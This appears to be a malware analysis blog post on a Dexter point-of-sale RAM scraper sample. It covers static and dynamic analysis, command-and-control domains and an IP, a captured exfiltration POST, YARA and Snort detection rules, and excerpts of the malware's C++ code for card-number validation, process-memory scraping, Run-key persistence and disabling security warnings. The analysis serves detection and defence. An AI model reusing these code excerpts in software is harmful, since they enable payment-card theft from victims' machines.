Source: VirusShare Malware Family: RAM Scraper Static Analysis Tools: pestudio, CFF Explorer, PEID, BinText, IDA Pro Dynamic Analysis Tools: pexplorer, ProcMon, RegShot, ProcDump, Autoruns, Wireshark, Sandboxie, Comodo Reports: (1) Comodo: http://camas.comodo.com/cgi-bin/submit?file=cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785 (2) VirusTotal: https://www.virustotal.com/en/file/cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785/analysis/1451004732/ I . Static Analysis: Internal name: HelpPane.exe Target machine: Intel 386 or later processors and compatible processors Compilation Timestamp: 2011-03-26 07:06:26 Entry Point: 0x000016AF File type: Win32 EXE Number of Sections: 11 MD5: 70feec581cd97454a74a0d7c1d3183d1 SHA256: cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785 File size: 52.0 KB (53248 bytes) Detection ratio: 51 / 54 PE imports: [+] KERNEL32.dll [+] USER32.dll Red Flags: The file original name is "ModuleReplace.exe". The size (-64604 bytes) of the Version resource is bigger than the maximum (6144) threshold. The content of the debug blob is invalid. The count (2) of imported libraries reached the minimum (3) threshold. The count (2) of imported functions reached the minimum (10) threshold. The section (name:.conas) is blacklisted. The section (name:.const) is blacklisted. The section (name:.ts050) is blacklisted. The section (name:.ts040) is blacklisted. The section (name:.ts030) is blacklisted. The section (name:.ts020) is blacklisted. The section (name:.ts010) is blacklisted. The count (7) of blacklisted sections reached the maximum (1) threshold. The file ignores Data Execution Prevention (DEP) as mitigation technique. The file ignores Address Space Layout Randomization (ASLR) as mitigation technique. The original filename (HelpPane.exe) is different than the file name (cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785). The file ignores cookies on the stack (GS) as mitigation technique. The file is not signed with a Digital Certificate. Here are some interesting strings: *Stepped into OEP using OllyDump: II. Dynamic Analysis: (1) Opened files C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785 c:\autoexec.bat (2) Read files c:\autoexec.bat (3) Copied files SRC: C:\cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785 DST: C:\Documents and Settings\<USER>\Application Data\umrea\umrea.exe (4) Deleted files C:\cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785 (5) Created processes C:\Program Files\Internet Explorer\iexplore.exe (6) Code injections in the following processes IEXPLORE.EXE (7) Created mutexes WindowsResilienceServiceMutex RasPbFile (8) Sent HTTP requests 193.107.19.165:80 URL: http://fabcaa97871555b68aa095335975e613.com/portal1/gateway.php TYPE: POST USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Content-Length: 509 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded page=VlRVXV1WUgBIVlJXXUhRXQNQSFwBAQdIVVVTBAEBXQNVBwFW&unm=MBYAFw==&cnm=LSooIA==&query=MgwLAQoSFkU9NQ==&spec=VldFJwwR&opt=VlNVVQ==&view=PjYcFhEACEU1FwoGABYWOG82HBYRAAhvFggWFksAHQBvBhYXFhZLAB0AbxIMCwkKAgoLSwAdAG8WABcTDAYAFksAHQBvCRYEFhZLAB0AbxYTBg0KFhFLAB0AbxYTBg0KFhFLAB0AbxYTBg0KFhFLAB0AbxYTBg0K Other HTTP queries: 67b3dba8bc6778101892eb77249db32e.com POST / HTTP/1.1 815ad1c058df1b7ba9c0998e2aa8a7b4.com POST / HTTP/1.1 e7bc2d0fceee1bdfd691a80c783173b4.com POST / HTTP/1.1 e7dce8e4671f8f03a040d08bb08ec07a.com POST / HTTP/1.1 7186343a80c6fa32811804d23765cda4.com POST / HTTP/1.1 11e2540739d7fbea1ab8f9aa7a107648.com POST / HTTP/1.1 (9) Sent DNS requests fabcaa97871555b68aa095335975e613.com (193.107.19.165:53) 67b3dba8bc6778101892eb77249db32e.com IN A + 815ad1c058df1b7ba9c0998e2aa8a7b4.com IN A + e7bc2d0fceee1bdfd691a80c783173b4.com IN A + e7dce8e4671f8f03a040d08bb08ec07a.com IN A + 7186343a80c6fa32811804d23765cda4.com IN A + 11e2540739d7fbea1ab8f9aa7a107648.com IN A + Incident Response: Contains ability to lookup the windows account name Installation/Persistence details "<Input Sample>" allocated 00000088 bytes of memory in "iexplore.exe" (Protection: "read/write") "<Input Sample>" allocated 00045056 bytes of memory in "iexplore.exe" (Protection: "execute/read/write") source API Call Changes memory access rights in foreign process to write/execute details "<Input Sample>" changed protection rights in "iexplore.exe" (Base: 000d0000, Size: 00045056, Protection: "execute/read/write") source API Call Writes data to a remote process details "<Input Sample>" wrote 32 bytes to a foreign process "iexplore.exe" (PID: 00001828) source API Call Anti-Reverse Engineering PE file has unusual entropy sections details .text with unusual entropies 7.09802892841 source Static Parser Environment Awareness Contains ability to query the machine version details [email protected] at PID 00004048 Possibly tries to detect the presence of a debugger details [email protected] at PID 00004048 source Hybrid Analysis Technology Installation/Persistence Contains ability to create a remote thread (often used for process injection) details [email protected] at PID 00004048 Contains ability to write to a remote process
details [email protected] at PID 00004048 Network Related Found potential URL in binary/memory details "http://%s%s" source String Informative Found strings in conjunction with a procedure lookup that resolve to a known API export symbol details Found reference to API [email protected] at PID 00004048 ( Loads the following Libraries: LoadLibrary("user32.dll"); LoadLibrary("advapi32.dll"); LoadLibrary("shell32.dll"); LoadLibrary("urlmon.dll"); LoadLibrary("wininet.dll"); LoadLibrary("gdi32.dll"); LoadLibrary("rpcrt4.dll"); Interesting C++ Functions: (1) Luhn Algorithm to validate credit card data int IsValidCC(const char* cc,int CClen) { const int m[] = {0,2,4,6,8,1,3,5,7,9}; int i, odd = 1, sum = 0; for (i = CClen; i--; odd = !odd) { int digit = cc[i] - '0'; sum += odd ? digit : m[digit]; } return sum % 10 == 0; } BOOL IsDigit(char c) { if(c>=0x30 && c<=0x39) { return TRUE; } else { return FALSE; } (2) XOR Encryption RandStrA(Key,5); _memset(EncodedKey,0x00,sizeof(EncodedKey)); base64_encode(Key,lstrlen(Key),EncodedKey,sizeof(EncodedKey)); (3) POS Scraping Calls: //1 Process32First(hProcesses,&ProcessInfo); do{ //Enumerate processes if(SkipProcess(ProcessInfo.szExeFile)==TRUE) { continue; } if(CurPID==ProcessInfo.th32ProcessID||CurPID==ProcessInfo.th32ParentProcessID) { continue; } hProcess = NULL; Sleep(10); //gives the CPU slice of time //2 hProcess = OpenProcess(PROCESS_VM_READ|PROCESS_QUERY_INFORMATION,FALSE,ProcessInfo.th32ProcessID); //3 while(1) { //Enumerate process memory regions _memset(&MBI,0x00,sizeof(MBI)); VirtualQueryEx(hProcess,(LPVOID)QueryAddr,&MBI,sizeof(MBI)); //if its bigger than 1 0 000 000 bytes, read only that amount
QueryAddr += (DWORD) MBI.RegionSize; //4 ReadProcessMemory Buf = pGlobalBuf; ReadProcessMemory(hProcess,(LPVOID)ReadAddr,Buf,BufSize,&BytesRead); //Common issue for dumpers, cuz you cant know if the memory region is not corrupted //5 VirtualQueryEx(hProcess,(LPVOID)QueryAddr,&MBI,sizeof(MBI)); //if its bigger than 1 0 000 000 bytes, read only that amount if(MBI.BaseAddress==0 && QueryAddr!=0) { break; } //memory regions finished //6 TrackSearch(Buf,BytesRead); TrackSearchNoSentinels(Buf,BytesRead); //Check if infected if(CheckIfInfected()==FALSE) { Infect(); } //Disable open-file warning - at every start just for sure DisableOpenFileWarning(); //Try to acquire debug privilegs GetDebugPrivs(); (4) Registry Injection: //Create the main registry key KeyOption = 0; RegCreateKeyEx(HKEY_CURRENT_USER,SoftwareName,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&KeyOption); LenInBytes = lstrlen(Uniq) * sizeof(char); RegSetValueEx(hKey,UniqName,0,REG_SZ,Uniq,LenInBytes); //store the UID RegCloseKey(hKey); SetLastError(ERROR_SUCCESS); RegOpenKeyEx(HKEY_LOCAL_MACHINE,RunPath,0,KEY_ALL_ACCESS,&hKey); if(GetLastError()==ERROR_SUCCESS) { //we are admin or system LenInBytes = lstrlenW(CurrentLocation) * sizeof(WCHAR); ret = RegSetValueExW(hKey,wUniq,0,REG_SZ,(const BYTE *)CurrentLocation,LenInBytes); //store the startup key if(ret!=0) { RegCloseKey(hKey); goto UserPrivs; } RegCloseKey(hKey); RegOpenKeyEx(HKEY_USERS,AllUsersRunPath,0,KEY_ALL_ACCESS,&hKey); LenInBytes = lstrlenW(CurrentLocation) * sizeof(WCHAR); RegSetValueExW(hKey,wUniq,0,REG_SZ,(const BYTE *)CurrentLocation,LenInBytes); //store the startup key RegCloseKey(hKey); } //we are regular user //try second to create user key UserPrivs: RegOpenKeyEx(HKEY_CURRENT_USER,RunPath,0,KEY_ALL_ACCESS,&hKey); LenInBytes = lstrlenW(CurrentLocation) * sizeof(WCHAR); RegSetValueExW(hKey,wUniq,0,REG_SZ,(const BYTE *)CurrentLocation,LenInBytes); //store the startup key RegCloseKey(hKey); void DisableOpenFileWarning() { RegCreateKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations",0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&KeyOption); LenInBytes = lstrlen(extensions) * sizeof(char); RegSetValueEx(hKey,"LowRiskFileTypes",0,REG_SZ,extensions,LenInBytes); RegCloseKey(hKey); RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0",0,KEY_ALL_ACCESS,&hKey); if(GetLastError()==ERROR_SUCCESS) { Value = 0; RegSetValueEx(hKey,"1806",0,REG_DWORD,(const BYTE *)&Value,sizeof(Value)); RegCloseKey(hKey); } } III. Yara Signature: rule Backdoor_Win32_Dexter_POS : POS_BDR { meta: author = "Vitali Kremez" date = "2015-12-24" description = "Detected Dexter POS" hash0 = "70feec581cd97454a74a0d7c1d3183d1" sample_filetype = "exe" strings: $string0 = " ModuleReplace.exe" $string1 = "AeE_nVlii_Mi" wide $string2 = " %s\%s\%s.exe " $string3 = "NXx_ChJzU_fSIw" $string4 = " DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" $string5 = "7 7$7(7,7074787<7@7D7H7L7P7T7X7" $string6 = "RenameTest@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z" $string7 = "test1.exe," $string8 = "guypqbuopKlgsqoD" $string9 = "2F2S2_2o2}2" $string10 = "LNr_NZbwwrz_sSQ" $string11 = "> >)>8>>>R>X>h>r>x>" $string12 = "NtQueryInformationProcess" $string13 = " WindowsResilienceServiceMutex" $string14 = "ModuleReplace.exe" $string15 = "82888>8C8d8p8" $string16 = "RenameFortation@@YG_JPAUIRootStorage@@PAUHUMPD__@@@Z" condition: 16 of them and filesize<53KB Sourcefire Rule: alert tcp any any -> any 80 (msg:" Dexter POS Backdoor Alert"; flow:to_server,established; content:" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”; “fabcaa97871555b68aa095335975e613.com/”; “67b3dba8bc6778101892eb77249db32e.com”;” 815ad1c058df1b7ba9c0998e2aa8a7b4”; “e7bc2d0fceee1bdfd691a80c783173b4.com”; “e7dce8e4671f8f03a040d08bb08ec07a.com”; “7186343a80c6fa32811804d23765cda4.com”; “11e2540739d7fbea1ab8f9aa7a107648.com”; noncase; pcre:"/.*(portal1/gateway.php).*/”; pcre: “/.*(\&cnm=|\&opt=| \&query=|\&spec=|\&ump= |\&unm= |\&val= |\&var=|\&view=).*/";classtype: Trojan-activity) Sourcefire Exfil Rule: alert tcp any any <> 193.107.19.165 80 (msg: "Dexter POS C2 Connect"; sid: 10003;)
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
September 2016
Categories |